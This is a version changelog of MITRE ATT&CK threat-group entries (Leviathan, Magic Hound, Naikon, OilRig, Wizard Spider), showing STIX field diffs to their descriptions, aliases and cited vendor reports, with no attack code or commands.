external_references[11]['description']Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.
external_references[11]['url']https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing
x_mitre_version1.52.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Secureworks NICKEL ACADEMY Dec 2017', 'description': 'Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.', 'url': 'https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing'}

[G0065] Leviathan

Current version: 3.0

Version changed from: 2.1 → 3.0


Old Description
New Description
t1[Leviathan](https://attack.mitre.org/groups/G0065) is a cybet1[Leviathan](https://attack.mitre.org/groups/G0065) is a Chin
>r espionage group that has been active since at least 2013. >ese state-sponsored cyber espionage group that has been attr
>The group generally targets defense and government organizat>ibuted to the Ministry of State Security's (MSS) Hainan Stat
>ions, but has also targeted a range of industries including >e Security Department and an affiliated front company.(Citat
>engineering firms, shipping and transportation, manufacturin>ion: CISA AA21-200A APT40 July 2021) Active since at least 2
>g, defense, government offices, and research universities in>009, [Leviathan](https://attack.mitre.org/groups/G0065) has 
> the United States, Western Europe, and along the South Chin>targeted the following sectors: academia, aerospace/aviation
>a Sea. (Citation: Proofpoint Leviathan Oct 2017) (Citation: >, biomedical, defense industrial base, government, healthcar
>FireEye Periscope March 2018)>e, manufacturing, maritime, and transportation across the US
 >, Canada, Europe, the Middle East, and Southeast Asia.(Citat
 >ion: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Le
 >viathan Oct 2017)(Citation: FireEye Periscope March 2018)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
external_referenceshttps://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html
external_referenceshttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 01:06:24.797000+00:002021-10-14 20:34:57.289000+00:00
description[Leviathan](https://attack.mitre.org/groups/G0065) is a cyber espionage group that has been active since at least 2013. The group generally targets defense and government organizations, but has also targeted a range of industries including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities in the United States, Western Europe, and along the South China Sea. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
external_references[2]['source_name']TEMP.JumperMUDCARP
external_references[2]['description']Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: FireEye APT40 March 2019)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
external_references[3]['source_name']APT40Kryptonite Panda
external_references[3]['description']The group identified by Proofpoint as Leviathan appears to significantly overlap with FireEye's reporting on APT40. Additionally, FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018)
external_references[4]['source_name']TEMP.PeriscopeGadolinium
external_references[4]['description']Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)(Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020)
external_references[5]['source_name']Proofpoint Leviathan Oct 2017BRONZE MOHAWK
external_references[5]['description']Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.(Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.)
external_references[6]['source_name']FireEye Periscope March 2018TEMP.Jumper
external_references[6]['description']FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)
external_references[7]['source_name']FireEye APT40 March 2019APT40
external_references[7]['description']Plan, F., et all. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesMUDCARP
aliasesKryptonite Panda
aliasesGadolinium
aliasesBRONZE MOHAWK
external_references{'source_name': 'TEMP.Periscope', 'description': 'Leviathan was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)'}
external_references{'source_name': 'CISA AA21-200A APT40 July 2021', 'description': 'CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021.', 'url': 'https://us-cert.cisa.gov/ncas/alerts/aa21-200a'}
external_references{'source_name': 'Proofpoint Leviathan Oct 2017', 'description': 'Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets'}
external_references{'source_name': 'FireEye Periscope March 2018', 'description': 'FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html'}
external_references{'source_name': 'Accenture MUDCARP March 2019', 'description': "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.", 'url': 'https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies'}
external_references{'source_name': 'Crowdstrike KRYPTONITE PANDA August 2018', 'description': 'Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.', 'url': 'https://www.crowdstrike.com/blog/two-birds-one-stone-panda/'}
external_references{'source_name': 'MSTIC GADOLINIUM September 2020', 'description': 'Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.', 'url': 'https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/'}
external_references{'source_name': 'SecureWorks BRONZE MOHAWK n.d.', 'description': 'SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/bronze-mohawk'}
external_references{'source_name': 'FireEye APT40 March 2019', 'description': 'Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html'}

[G0059] Magic Hound

Current version: 4.0

Version changed from: 3.0 → 4.0


Old Description
New Description
t1[Magic Hound](https://attack.mitre.org/groups/G0059) is an It1[Magic Hound](https://attack.mitre.org/groups/G0059) is an I
>ranian-sponsored threat group that conducts long term, resou>ranian-sponsored threat group that conducts long term, resou
>rce-intensive cyber espionage operations, dating back as ear>rce-intensive cyber espionage operations, likely on behalf o
>ly as 2014. The group typically targets U.S. and Middle East>f the Islamic Revolutionary Guard Corps. They have targeted 
>ern military organizations, as well as other government pers>U.S. and Middle Eastern government and military personnel, a
>onnel, via complex social engineering campaigns.(Citation: F>cademics, journalists, and organizations such as the World H
>ireEye APT35 2018)>ealth Organization (WHO), via complex social engineering cam
 >paigns since at least 2014.(Citation: FireEye APT35 2018)(Ci
 >tation: ClearSky Kittens Back 3 August 2020)(Citation: Certf
 >a Charming Kitten January 2021)(Citation: Secureworks COBALT
 > ILLUSION Threat Profile)(Citation: Proofpoint TA453 July202
 >1)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
values_changed
STIX FieldOld valueNew Value
modified2021-04-25 22:34:23.617000+00:002021-10-04 13:12:54.646000+00:00
description[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, dating back as early as 2014. The group typically targets U.S. and Middle Eastern military organizations, as well as other government personnel, via complex social engineering campaigns.(Citation: FireEye APT35 2018)[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted U.S. and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)
external_references[2]['source_name']COBALT ILLUSIONTA453
external_references[2]['description'](Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)
external_references[3]['source_name']Charming KittenCOBALT ILLUSION
external_references[3]['description'](Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Secureworks COBALT ILLUSION Threat Profile)
external_references[4]['source_name']ITG18Charming Kitten
external_references[4]['description'](Citation: IBM ITG18 2020)(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)
external_references[5]['source_name']PhosphorusITG18
external_references[5]['description'](Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: IBM ITG18 2020)
external_references[6]['source_name']NewscasterPhosphorus
external_references[6]['description']Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)
external_references[7]['source_name']APT35Newscaster
external_references[7]['description'](Citation: FireEye APT35 2018)Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)
external_references[8]['source_name']FireEye APT35 2018APT35
external_references[8]['description']Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)
external_references[9]['source_name']Unit 42 Magic Hound Feb 2017FireEye APT35 2018
external_references[9]['description']Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.
external_references[9]['url']https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
external_references[10]['source_name']Secureworks COBALT ILLUSION Threat ProfileClearSky Kittens Back 3 August 2020
external_references[10]['description']Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.
external_references[10]['url']https://www.secureworks.com/research/threat-profiles/cobalt-illusionhttps://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf
external_references[11]['source_name']ClearSky Charming Kitten Dec 2017Certfa Charming Kitten January 2021
external_references[11]['description']ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.
external_references[11]['url']http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdfhttps://blog.certfa.com/posts/charming-kitten-christmas-gift/
external_references[12]['source_name']Eweek Newscaster and Charming Kitten May 2014Secureworks COBALT ILLUSION Threat Profile
external_references[12]['description']Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.
external_references[12]['url']https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gatheringhttps://www.secureworks.com/research/threat-profiles/cobalt-illusion
external_references[13]['source_name']ClearSky Kittens Back 2 Oct 2019Proofpoint TA453 July2021
external_references[13]['description']ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.
external_references[13]['url']https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdfhttps://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453
external_references[14]['source_name']ClearSky Kittens Back 3 August 2020Unit 42 Magic Hound Feb 2017
external_references[14]['description']ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
external_references[14]['url']https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdfhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
external_references[15]['source_name']IBM ITG18 2020Proofpoint TA453 March 2021
external_references[15]['description']Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.
external_references[15]['url']https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential
external_references[16]['source_name']Microsoft Phosphorus Mar 2019ClearSky Charming Kitten Dec 2017
external_references[16]['description']Burt, T.. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
external_references[16]['url']https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
external_references[17]['source_name']Microsoft Phosphorus Oct 2020Eweek Newscaster and Charming Kitten May 2014
external_references[17]['description']Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.
external_references[17]['url']https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering
external_references[18]['source_name']US District Court of DC Phosphorus Complaint 2019ClearSky Kittens Back 2 Oct 2019
external_references[18]['description']US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.
external_references[18]['url']https://noticeofpleadings.com/phosphorus/files/Complaint.pdfhttps://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesTA453
external_references{'source_name': 'IBM ITG18 2020', 'description': 'Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.', 'url': 'https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/'}
external_references{'source_name': 'Microsoft Phosphorus Mar 2019', 'description': 'Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.', 'url': 'https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/'}
external_references{'source_name': 'Microsoft Phosphorus Oct 2020', 'description': 'Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.', 'url': 'https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/'}
external_references{'source_name': 'US District Court of DC Phosphorus Complaint 2019', 'description': 'US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.', 'url': 'https://noticeofpleadings.com/phosphorus/files/Complaint.pdf'}

[G0019] Naikon

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Naikon](https://attack.mitre.org/groups/G0019) is a threat t1[Naikon](https://attack.mitre.org/groups/G0019) is assessed 
>group that has focused on targets around the South China Sea>to be a state-sponsored cyber espionage group attributed to 
>.(Citation: Baumgartner Naikon 2015) The group has been attr>the Chinese People’s Liberation Army’s (PLA) Chengdu Militar
>ibuted to the Chinese People’s Liberation Army’s (PLA) Cheng>y Region Second Technical Reconnaissance Bureau (Military Un
>du Military Region Second Technical Reconnaissance Bureau(Mi>it Cover Designator 78020).(Citation: CameraShy) Active sinc
>litary Unit Cover Designator 78020).(Citation: CameraShy) Wh>e at least 2010, [Naikon](https://attack.mitre.org/groups/G0
>ile [Naikon](https://attack.mitre.org/groups/G0019) shares s>019) has primarily conducted operations against government, 
>ome characteristics with [APT30](https://attack.mitre.org/gr>military, and civil organizations in Southeast Asia, as well
>oups/G0013), the two groups do not appear to be exact matche> as against international bodies such as the United Nations 
>s.(Citation: Baumgartner Golovkin Naikon 2015)>Development Programme (UNDP) and the Association of Southeas
 >t Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baum
 >gartner Naikon 2015)   While [Naikon](https://attack.mitre.o
 >rg/groups/G0019) shares some characteristics with [APT30](ht
 >tps://attack.mitre.org/groups/G0013), the two groups do not 
 >appear to be exact matches.(Citation: Baumgartner Golovkin N
 >aikon 2015)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Kyaw Pyiyt Htet, @KyawPyiytHtet']
values_changed
STIX FieldOld valueNew Value
modified2020-07-03 21:48:57.725000+00:002021-08-19 18:23:23.507000+00:00
description[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea.(Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau(Military Unit Cover Designator 78020).(Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)
external_references[2]['source_name']Baumgartner Naikon 2015CameraShy
external_references[2]['description']Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.
external_references[2]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdfhttp://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf
external_references[3]['source_name']CameraShyBaumgartner Naikon 2015
external_references[3]['description']ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.
external_references[3]['url']http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdfhttps://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf
x_mitre_version1.12.0

[G0049] OilRig

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of industries, including financial, governm>rgeted a variety of sectors, including financial, government
>ent, energy, chemical, and telecommunications, and has large>, energy, chemical, and telecommunications. It appears the g
>ly focused its operations within the Middle East. It appears>roup carries out supply chain attacks, leveraging the trust 
> the group carries out supply chain attacks, leveraging the >relationship between organizations to attack their primary t
>trust relationship between organizations to attack their pri>argets. FireEye assesses that the group works on behalf of t
>mary targets. FireEye assesses that the group works on behal>he Iranian government based on infrastructure details that c
>f of the Iranian government based on infrastructure details >ontain references to Iran, use of Iranian infrastructure, an
>that contain references to Iran, use of Iranian infrastructu>d targeting that aligns with nation-state interests. (Citati
>re, and targeting that aligns with nation-state interests. (>on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig 
>Citation: Palo Alto OilRig April 2017) (Citation: ClearSky O>Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P
>ilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citat>alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20
>ion: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook >17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA
>Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit >DAGENT July 2018)
>42 QUADAGENT July 2018) This group was previously tracked un 
>der two distinct groups, APT34 and OilRig, but was combined  
>due to additional reporting giving higher confidence about t 
>he overlap of the activity. 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:59:49.642000+00:002021-10-15 22:04:08.941000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Check Point APT34 April 2021', 'description': 'Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.', 'url': 'https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/'}

[G0102] Wizard Spider

Current version: 2.0

Version changed from: 1.3 → 2.0


Old Description
New Description
t1[Wizard Spider](https://attack.mitre.org/groups/G0102) is a t1[Wizard Spider](https://attack.mitre.org/groups/G0102) is a 
>financially motivated criminal group that has been conductin>Russia-based financially motivated threat group originally k
>g ransomware campaigns since at least August 2018 against a >nown for the creation and deployment of [TrickBot](https://a
>variety of organizations, ranging from major corporations to>ttack.mitre.org/software/S0266) since at least 2016. [Wizard
> hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citatio> Spider](https://attack.mitre.org/groups/G0102) possesses a 
>n: DHS/CISA Ransomware Targeting Healthcare October 2020)>diverse arsenal of tools and has conducted ransomware campai
 >gns against a variety of organizations, ranging from major c
 >orporations to hospitals.(Citation: CrowdStrike Ryuk January
 > 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare Oc
 >tober 2020)(Citation: CrowdStrike Wizard Spider October 2020
 >)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-29 17:45:44.841000+00:002021-10-14 17:27:41.194000+00:00
description[Wizard Spider](https://attack.mitre.org/groups/G0102) is a financially motivated criminal group that has been conducting ransomware campaigns since at least August 2018 against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)
external_references[6]['source_name']FireEye KEGTAP SINGLEMALT October 2020CrowdStrike Wizard Spider October 2020
external_references[6]['description']Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
